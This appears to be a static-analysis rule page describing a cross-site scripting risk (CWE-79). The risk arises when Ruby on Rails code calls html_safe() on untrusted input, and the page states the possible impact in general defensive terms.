Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)
| Property | |
|---|---|
| Language |  |
| Severity |  |
| CWE | CWE-79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) |
| OWASP | A07:2017 - Cross-Site Scripting (XSS) |
| Confidence Level | Low |
| Impact Level | Medium |
| Likelihood Level | Low |
Description#
Using ‘html_safe()’ in Ruby on Rails tells the framework to trust the input and skip HTML escaping, which can let unsafe content be rendered directly in the browser. If this method is called on data that comes from users or other external sources, it can create a serious security risk.
Impact#
If exploited, attackers can inject malicious scripts into your web pages (Cross-Site Scripting/XSS), potentially stealing user data, hijacking sessions, or defacing your site. This can lead to data breaches, loss of user trust, and regulatory or reputational consequences for your organization.